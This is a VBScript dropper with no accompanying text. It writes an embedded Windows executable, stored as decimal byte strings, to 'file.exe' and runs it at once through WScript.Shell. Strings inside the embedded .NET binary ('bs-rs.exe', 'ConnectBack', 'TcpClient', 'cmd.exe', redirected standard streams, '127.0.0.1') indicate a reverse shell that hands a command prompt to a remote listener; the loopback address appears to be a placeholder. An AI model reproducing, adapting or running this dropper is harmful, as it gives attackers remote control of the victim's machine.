DoIt

Sub DoIt()
	Dim strFile

	strFile = "file.exe"
	DumpFile strFile
	RunFile strFile
End Sub

Sub RunFile(strFilename)
	Dim sh

	Set sh = CreateObject("WScript.Shell")
	sh.Run strFilename
End Sub

Sub WriteBytes(objFile, strBytes)
	Dim aNumbers
	Dim iIter

	aNumbers = split(strBytes)
	for iIter = lbound(aNumbers) to ubound(aNumbers)
		objFile.Write Chr(aNumbers(iIter))
	next
End Sub

Sub DumpFile1(objFile)
	WriteBytes objFile, "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205"
	WriteBytes objFile, "33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111"
	WriteBytes objFile, "116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10"
	WriteBytes objFile, "36 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 252 241 60 96 0 0 0 0 0 0 0 0 224 0 2 1 11 1 11"
	WriteBytes objFile, "0 0 10 0 0 0 8 0 0 0 0 0 0 254 40 0 0 0 32 0 0 0 64 0 0 0 0 64 0 0 32 0 0 0 2 0 0"
	WriteBytes objFile, "4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 128 0 0 0 2 0 0 0 0 0 0 3 0 64 133 0 0 16 0 0 16"
	WriteBytes objFile, "0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 164 40 0 0 87 0 0 0 0 64 0"
	WriteBytes objFile, "0 208 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 96 0 0 12 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0"
	WriteBytes objFile, "0 8 0 0 0 0 0 0 0 0 0 0 0 8 32 0 0 72 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0"
	WriteBytes objFile, "0 4 9 0 0 0 32 0 0 0 10 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 115 114"
	WriteBytes objFile, "99 0 0 0 208 4 0 0 0 64 0 0 0 6 0 0 0 12 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46"
	WriteBytes objFile, "114 101 108 111 99 0 0 12 0 0 0 0 96 0 0 0 2 0 0 0 18 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 224 40 0 0 0 0 0 0 72 0 0 0 2 0 5 0 16 34"
	WriteBytes objFile, "0 0 148 6 0 0 1 0 0 0 1 0 0 6 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 27 48 3 0 30 1 0 0 1 0 0 17 0 114 1 0"
	WriteBytes objFile, "0 112 32 187 1 0 0 115 3 0 0 10 10 0 6 111 4 0 0 10 11 0 7 115 5 0 0 10 12 0 7 115"
	WriteBytes objFile, "6 0 0 10 128 1 0 0 4 115 7 0 0 10 13 115 8 0 0 10 19 4 17 4 111 9 0 0 10 114 21 0"
	WriteBytes objFile, "0 112 111 10 0 0 10 0 17 4 111 9 0 0 10 23 111 11 0 0 10 0 17 4 111 9 0 0 10 22 111"
	WriteBytes objFile, "12 0 0 10 0 17 4 111 9 0 0 10 23 111 13 0 0 10 0 17 4 111 9 0 0 10 23 111 14 0 0 10"
	WriteBytes objFile, "0 17 4 111 9 0 0 10 23 111 15 0 0 10 0 17 4 20 254 6 2 0 0 6 115 16 0 0 10 111 17"
	WriteBytes objFile, "0 0 10 0 17 4 111 18 0 0 10 38 17 4 111 19 0 0 10 0 43 43 0 9 8 111 20 0 0 10 111"
	WriteBytes objFile, "21 0 0 10 38 17 4 111 22 0 0 10 9 111 23 0 0 10 0 9 22 9 111 24 0 0 10 111 25 0 0"
	WriteBytes objFile, "10 38 0 23 19 5 43 208 8 20 254 1 19 5 17 5 45 7 8 111 26 0 0 10 0 220 7 20 254 1"
	WriteBytes objFile, "19 5 17 5 45 7 7 111 26 0 0 10 0 220 6 20 254 1 19 5 17 5 45 7 6 111 26 0 0 10 0 220"
	WriteBytes objFile, "0 0 1 40 0 0 2 0 33 0 199 232 0 18 0 0 0 0 2 0 25 0 225 250 0 18 0 0 0 0 2 0 17 0"
	WriteBytes objFile, "251 12 1 18 0 0 0 0 27 48 2 0 71 0 0 0 2 0 0 17 0 115 7 0 0 10 10 3 111 27 0 0 10"
	WriteBytes objFile, "40 28 0 0 10 12 8 45 48 0 0 6 3 111 27 0 0 10 111 21 0 0 10 38 126 1 0 0 4 6 111 23"
	WriteBytes objFile, "0 0 10 0 126 1 0 0 4 111 29 0 0 10 0 0 222 5 11 0 0 222 0 0 0 42 0 1 16 0 0 0 0 23"
	WriteBytes objFile, "0 40 63 0 5 18 0 0 1 30 2 40 30 0 0 10 42 66 83 74 66 1 0 1 0 0 0 0 0 12 0 0 0 118"
	WriteBytes objFile, "52 46 48 46 51 48 51 49 57 0 0 0 0 5 0 108 0 0 0 28 2 0 0 35 126 0 0 136 2 0 0 28"
	WriteBytes objFile, "3 0 0 35 83 116 114 105 110 103 115 0 0 0 0 164 5 0 0 40 0 0 0 35 85 83 0 204 5 0"
	WriteBytes objFile, "0 16 0 0 0 35 71 85 73 68 0 0 0 220 5 0 0 184 0 0 0 35 66 108 111 98 0 0 0 0 0 0 0"
	WriteBytes objFile, "2 0 0 1 87 21 2 0 9 0 0 0 0 250 37 51 0 22 0 0 1 0 0 0 18 0 0 0 2 0 0 0 1 0 0 0 3"
	WriteBytes objFile, "0 0 0 3 0 0 0 30 0 0 0 2 0 0 0 2 0 0 0 1 0 0 0 2 0 0 0 0 0 10 0 1 0 0 0 0 0 6 0 56"
	WriteBytes objFile, "0 49 0 6 0 73 0 63 0 10 0 123 0 104 0 6 0 232 0 200 0 6 0 8 1 200 0 10 0 63 1 44 1"
	WriteBytes objFile, "10 0 73 1 44 1 6 0 97 1 63 0 6 0 110 1 63 0 6 0 129 1 117 1 10 0 143 1 104 0 10 0"
	WriteBytes objFile, "151 1 104 0 10 0 57 2 104 0 6 0 131 2 63 0 6 0 176 2 63 0 6 0 215 2 49 0 6 0 244 2"
	WriteBytes objFile, "49 0 6 0 15 3 49 0 0 0 0 0 1 0 0 0 0 0 1 0 1 0 1 0 16 0 20 0 28 0 5 0 1 0 1 0 17 0"
	WriteBytes objFile, "86 0 10 0 80 32 0 0 0 0 150 0 99 0 14 0 1 0 164 33 0 0 0 0 145 0 145 0 20 0 2 0 8"
	WriteBytes objFile, "34 0 0 0 0 134 24 166 0 27 0 4 0 0 0 1 0 172 0 0 0 1 0 177 0 0 0 2 0 192 0 33 0 166"
	WriteBytes objFile, "0 31 0 41 0 166 0 27 0 49 0 166 0 36 0 49 0 87 1 42 0 65 0 166 0 47 0 17 0 166 0 47"
	WriteBytes objFile, "0 81 0 166 0 27 0 89 0 166 0 27 0 89 0 168 1 53 0 97 0 182 1 58 0 97 0 195 1 63 0"
	WriteBytes objFile, "97 0 214 1 63 0 97 0 234 1 63 0 97 0 5 2 63 0 97 0 31 2 63 0 105 0 166 0 68 0 89 0"
	WriteBytes objFile, "82 2 74 0 89 0 105 2 80 0 89 0 111 2 27 0 113 0 142 2 84 0 81 0 151 2 88 0 89 0 158"
	WriteBytes objFile, "2 94 0 121 0 187 2 99 0 81 0 197 2 104 0 81 0 208 2 108 0 129 0 227 2 27 0 25 0 235"
	WriteBytes objFile, "2 84 0 137 0 251 2 129 0 121 0 9 3 27 0 9 0 166 0 27 0 46 0 11 0 142 0 46 0 19 0 151"
	WriteBytes objFile, "0 115 0 134 0 4 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 38 1 0 0 4 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 1 0 40 0 0 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 1 0 49 0 0 0 0 0 0 0 0 60 77 111 100 117"
	WriteBytes objFile, "108 101 62 0 98 115 45 114 115 46 101 120 101 0 80 114 111 103 114 97 109 0 67 111"
	WriteBytes objFile, "110 110 101 99 116 66 97 99 107 0 109 115 99 111 114 108 105 98 0 83 121 115 116 101"
	WriteBytes objFile, "109 0 79 98 106 101 99 116 0 83 121 115 116 101 109 46 73 79 0 83 116 114 101 97 109"
	WriteBytes objFile, "87 114 105 116 101 114 0 115 116 114 101 97 109 87 114 105 116 101 114 0 77 97 105"
	WriteBytes objFile, "110 0 83 121 115 116 101 109 46 68 105 97 103 110 111 115 116 105 99 115 0 68 97 116"
	WriteBytes objFile, "97 82 101 99 101 105 118 101 100 69 118 101 110 116 65 114 103 115 0 67 109 100 79"
	WriteBytes objFile, "117 116 112 117 116 68 97 116 97 72 97 110 100 108 101 114 0 46 99 116 111 114 0 97"
	WriteBytes objFile, "114 103 115 0 115 101 110 100 105 110 103 80 114 111 99 101 115 115 0 111 117 116"
	WriteBytes objFile, "76 105 110 101 0 83 121 115 116 101 109 46 82 117 110 116 105 109 101 46 67 111 109"
	WriteBytes objFile, "112 105 108 101 114 83 101 114 118 105 99 101 115 0 67 111 109 112 105 108 97 116"
	WriteBytes objFile, "105 111 110 82 101 108 97 120 97 116 105 111 110 115 65 116 116 114 105 98 117 116"
	WriteBytes objFile, "101 0 82 117 110 116 105 109 101 67 111 109 112 97 116 105 98 105 108 105 116 121"
	WriteBytes objFile, "65 116 116 114 105 98 117 116 101 0 98 115 45 114 115 0 83 121 115 116 101 109 46"
	WriteBytes objFile, "78 101 116 46 83 111 99 107 101 116 115 0 84 99 112 67 108 105 101 110 116 0 78 101"
	WriteBytes objFile, "116 119 111 114 107 83 116 114 101 97 109 0 71 101 116 83 116 114 101 97 109 0 83"
	WriteBytes objFile, "116 114 101 97 109 82 101 97 100 101 114 0 83 116 114 101 97 109 0 83 121 115 116"
	WriteBytes objFile, "101 109 46 84 101 120 116 0 83 116 114 105 110 103 66 117 105 108 100 101 114 0 80"
	WriteBytes objFile, "114 111 99 101 115 115 0 80 114 111 99 101 115 115 83 116 97 114 116 73 110 102 111"
	WriteBytes objFile, "0 103 101 116 95 83 116 97 114 116 73 110 102 111 0 115 101 116 95 70 105 108 101"
	WriteBytes objFile, "78 97 109 101 0 115 101 116 95 67 114 101 97 116 101 78 111 87 105 110 100 111 119"
	WriteBytes objFile, "0 115 101 116 95 85 115 101 83 104 101 108 108 69 120 101 99 117 116 101 0 115 101"
	WriteBytes objFile, "116 95 82 101 100 105 114 101 99 116 83 116 97 110 100 97 114 100 79 117 116 112 117"
	WriteBytes objFile, "116 0 115 101 116 95 82 101 100 105 114 101 99 116 83 116 97 110 100 97 114 100 73"
	WriteBytes objFile, "110 112 117 116 0 115 101 116 95 82 101 100 105 114 101 99 116 83 116 97 110 100 97"
	WriteBytes objFile, "114 100 69 114 114 111 114 0 68 97 116 97 82 101 99 101 105 118 101 100 69 118 101"
	WriteBytes objFile, "110 116 72 97 110 100 108 101 114 0 97 100 100 95 79 117 116 112 117 116 68 97 116"
	WriteBytes objFile, "97 82 101 99 101 105 118 101 100 0 83 116 97 114 116 0 66 101 103 105 110 79 117 116"
	WriteBytes objFile, "112 117 116 82 101 97 100 76 105 110 101 0 84 101 120 116 82 101 97 100 101 114 0"
	WriteBytes objFile, "82 101 97 100 76 105 110 101 0 65 112 112 101 110 100 0 103 101 116 95 83 116 97 110"
	WriteBytes objFile, "100 97 114 100 73 110 112 117 116 0 84 101 120 116 87 114 105 116 101 114 0 87 114"
	WriteBytes objFile, "105 116 101 76 105 110 101 0 103 101 116 95 76 101 110 103 116 104 0 82 101 109 111"
	WriteBytes objFile, "118 101 0 73 68 105 115 112 111 115 97 98 108 101 0 68 105 115 112 111 115 101 0 103"
	WriteBytes objFile, "101 116 95 68 97 116 97 0 83 116 114 105 110 103 0 73 115 78 117 108 108 79 114 69"
	WriteBytes objFile, "109 112 116 121 0 70 108 117 115 104 0 69 120 99 101 112 116 105 111 110 0 0 0 0 0"
	WriteBytes objFile, "19 49 0 50 0 55 0 46 0 48 0 46 0 48 0 46 0 49 0 0 15 99 0 109 0 100 0 46 0 101 0 120"
	WriteBytes objFile, "0 101 0 0 0 0 0 168 203 53 184 254 187 221 66 134 29 34 101 150 187 116 134 0 8 183"
	WriteBytes objFile, "122 92 86 25 52 224 137 3 6 18 9 5 0 1 1 29 14 6 0 2 1 28 18 13 3 32 0 1 4 32 1 1"
	WriteBytes objFile, "8 5 32 2 1 14 8 4 32 0 18 29 5 32 1 1 18 37 4 32 0 18 49 4 32 1 1 14 4 32 1 1 2 5"
	WriteBytes objFile, "32 2 1 28 24 5 32 1 1 18 53 3 32 0 2 3 32 0 14 5 32 1 18 41 14 4 32 0 18 9 4 32 1"
	WriteBytes objFile, "1 28 3 32 0 8 6 32 2 18 41 8 8 13 7 6 18 25 18 37 18 33 18 41 18 45 2 4 0 1 2 14 7"
	WriteBytes objFile, "7 3 18 41 18 73 2 8 1 0 8 0 0 0 0 0 30 1 0 1 0 84 2 22 87 114 97 112 78 111 110 69"
	WriteBytes objFile, "120 99 101 112 116 105 111 110 84 104 114 111 119 115 1 0 0 204 40 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 238 40 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 224 40 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 95 67 111 114 69 120 101 77 97 105 110 0 109 115 99 111"
	WriteBytes objFile, "114 101 101 46 100 108 108 0 0 0 0 0 255 37 0 32 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 2 0 16 0 0 0 32 0 0 128 24 0 0 0 56 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 1 0 1 0 0 0 80 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 104 0 0 128 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0"
	WriteBytes objFile, "0 144 0 0 0 160 64 0 0 60 2 0 0 0 0 0 0 0 0 0 0 224 66 0 0 234 1 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 60 2 52 0 0 0 86 0 83 0 95 0 86 0 69 0 82 0 83 0 73 0 79 0 78 0 95 0 73 0 78 0 70"
	WriteBytes objFile, "0 79 0 0 0 0 0 189 4 239 254 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 63 0 0 0 0 0"
	WriteBytes objFile, "0 0 4 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 68 0 0 0 1 0 86 0 97 0 114 0 70 0 105"
	WriteBytes objFile, "0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 0 0 36 0 4 0 0 0 84 0 114 0 97 0 110 0 115"
	WriteBytes objFile, "0 108 0 97 0 116 0 105 0 111 0 110 0 0 0 0 0 0 0 176 4 156 1 0 0 1 0 83 0 116 0 114"
	WriteBytes objFile, "0 105 0 110 0 103 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 120 1 0 0 1"
	WriteBytes objFile, "0 48 0 48 0 48 0 48 0 48 0 52 0 98 0 48 0 0 0 44 0 2 0 1 0 70 0 105 0 108 0 101 0"
	WriteBytes objFile, "68 0 101 0 115 0 99 0 114 0 105 0 112 0 116 0 105 0 111 0 110 0 0 0 0 0 32 0 0 0 48"
	WriteBytes objFile, "0 8 0 1 0 70 0 105 0 108 0 101 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 0 0"
	WriteBytes objFile, "48 0 46 0 48 0 46 0 48 0 46 0 48 0 0 0 52 0 10 0 1 0 73 0 110 0 116 0 101 0 114 0"
	WriteBytes objFile, "110 0 97 0 108 0 78 0 97 0 109 0 101 0 0 0 98 0 115 0 45 0 114 0 115 0 46 0 101 0"
	WriteBytes objFile, "120 0 101 0 0 0 40 0 2 0 1 0 76 0 101 0 103 0 97 0 108 0 67 0 111 0 112 0 121 0 114"
	WriteBytes objFile, "0 105 0 103 0 104 0 116 0 0 0 32 0 0 0 60 0 10 0 1 0 79 0 114 0 105 0 103 0 105 0"
	WriteBytes objFile, "110 0 97 0 108 0 70 0 105 0 108 0 101 0 110 0 97 0 109 0 101 0 0 0 98 0 115 0 45 0"
	WriteBytes objFile, "114 0 115 0 46 0 101 0 120 0 101 0 0 0 52 0 8 0 1 0 80 0 114 0 111 0 100 0 117 0 99"
	WriteBytes objFile, "0 116 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 48 0 46 0 48 0 46 0 48 0 46 0"
	WriteBytes objFile, "48 0 0 0 56 0 8 0 1 0 65 0 115 0 115 0 101 0 109 0 98 0 108 0 121 0 32 0 86 0 101"
	WriteBytes objFile, "0 114 0 115 0 105 0 111 0 110 0 0 0 48 0 46 0 48 0 46 0 48 0 46 0 48 0 0 0 0 0 0 0"
	WriteBytes objFile, "239 187 191 60 63 120 109 108 32 118 101 114 115 105 111 110 61 34 49 46 48 34 32"
	WriteBytes objFile, "101 110 99 111 100 105 110 103 61 34 85 84 70 45 56 34 32 115 116 97 110 100 97 108"
	WriteBytes objFile, "111 110 101 61 34 121 101 115 34 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120"
	WriteBytes objFile, "109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111"
	WriteBytes objFile, "115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 34 32 109 97 110 105 102 101"
	WriteBytes objFile, "115 116 86 101 114 115 105 111 110 61 34 49 46 48 34 62 13 10 32 32 60 97 115 115"
	WriteBytes objFile, "101 109 98 108 121 73 100 101 110 116 105 116 121 32 118 101 114 115 105 111 110 61"
	WriteBytes objFile, "34 49 46 48 46 48 46 48 34 32 110 97 109 101 61 34 77 121 65 112 112 108 105 99 97"
	WriteBytes objFile, "116 105 111 110 46 97 112 112 34 47 62 13 10 32 32 60 116 114 117 115 116 73 110 102"
	WriteBytes objFile, "111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105"
	WriteBytes objFile, "99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 50 34 62 13 10 32 32"
	WriteBytes objFile, "32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113"
	WriteBytes objFile, "117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 32 120 109 108 110"
	WriteBytes objFile, "115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102"
	WriteBytes objFile, "116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 32 32 32 32 60 114"
	WriteBytes objFile, "101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108"
	WriteBytes objFile, "32 108 101 118 101 108 61 34 97 115 73 110 118 111 107 101 114 34 32 117 105 65 99"
	WriteBytes objFile, "99 101 115 115 61 34 102 97 108 115 101 34 47 62 13 10 32 32 32 32 32 32 60 47 114"
	WriteBytes objFile, "101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32"
	WriteBytes objFile, "32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115"
	WriteBytes objFile, "116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 12 0 0 0 0 57 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
	WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
End Sub

Sub DumpFile(strFilename)
	Dim objFSO
	Dim objFile

	Set objFSO = CreateObject("Scripting.FileSystemObject")
	Set objFile = objFSO.OpenTextFile(strFilename, 2, true)
	DumpFile1 objFile
	objFile.Close
End Sub
